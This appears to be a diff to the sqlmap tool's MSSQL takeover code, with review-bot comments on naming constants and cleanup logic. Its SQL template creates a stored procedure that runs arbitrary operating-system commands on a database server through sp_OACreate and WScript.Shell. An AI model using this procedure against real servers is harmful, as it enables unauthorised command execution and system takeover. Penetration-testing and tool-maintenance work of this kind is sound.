diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 706863ca0..5ab26f6a2 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -52,10 +52,9 @@ class Xp_cmdshell:
         inject.goStacked(agent.runAsDBMSUser(cmd))
         self._randStr = randomStr(lowercase=True)
-        self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
-        self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew
+        self.xpCmdshellStr = "master..new_xp_cmdshell"
-        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)
+        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)
         if Backend.isVersionWithin(("2005", "2008")):
             cmd += ";RECONFIGURE WITH OVERRIDE"
diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py
index f62e17ebf..cc2b38599 100644
--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@@ -162,7 +162,7 @@ class Miscellaneous:
             inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
         if Backend.isDbms(DBMS.MSSQL):
-            return
+            udfDict = {"master..new_xp_cmdshell": None}
         if udfDict is None:
             udfDict = self.sysUdfs
diff --git a/procs/mssqlserver/create_new_xp_cmdshell.sql b/procs/mssqlserver/create_new_xp_cmdshell.sql
index 913f368c1..005730860 100644
--- a/procs/mssqlserver/create_new_xp_cmdshell.sql
+++ b/procs/mssqlserver/create_new_xp_cmdshell.sql
@@ -1,3 +1,3 @@
 DECLARE @%RANDSTR% nvarchar(999);
-set @%RANDSTR%='CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
+set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
 EXEC master..sp_executesql @%RANDSTR%
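Review bot: The procedure name `"master..new_xp_cmdshell"` assigned to `self.xpCmdshellStr` is now a literal that must stay in sync with the same literal in plugins/generic/misc.py and with `new_xp_cmdshell` inside procs/mssqlserver/create_new_xp_cmdshell.sql; a rename in one place silently breaks the cleanup in the other. I would hoist it into one module-level constant (for example `NEW_XP_CMDSHELL = "master..new_xp_cmdshell"` next to the other MSSQL settings) and have both Python call sites read it, with a comment in the SQL template noting that the name is mirrored there. Since `self._xpCmdshellNew` is no longer assigned, any remaining reference to it elsewhere in Xp_cmdshell would now raise AttributeError at runtime; that cannot be confirmed from this hunk. The enclosing method starts and ends outside the hunk.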
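Review bot: Replacing the early `return` with `udfDict = {"master..new_xp_cmdshell": None}` means the MSSQL branch now falls through into the generic removal loop below, which is outside the hunk and which the old code deliberately skipped; whether that loop emits a statement that is valid for a stored procedure (as opposed to the functions in `self.sysUdfs`) and what it does with the `None` value cannot be seen here and should be checked. The object is only created on the code path in lib/takeover/xp_cmdshell.py, so the drop can run against a server where it never existed; if the loop does not already pass `silent=True` the way the `DROP TABLE` two lines above does, the failure would surface as an error during cleanup. I would add a one-line comment at the assignment, `# MSSQL: the only artefact to remove is the helper procedure created by Xp_cmdshell`, so the reason the value is `None` is recorded. The enclosing method starts outside the hunk.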
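Review bot: Hard-coding `new_xp_cmdshell` in the `CREATE PROCEDURE` text introduces a collision that the former `%XP_CMDSHELL_NEW%` placeholder avoided: if a previous session's cleanup in plugins/generic/misc.py did not complete, the next run's `CREATE PROCEDURE` fails with an object-already-exists error instead of proceeding. The cleanup path therefore has to be reliable, or the template needs an existence check before the create. A comment at the top of the file, `-- procedure name is fixed and mirrored in lib/takeover/xp_cmdshell.py and plugins/generic/misc.py`, would make the coupling visible to whoever next edits the template.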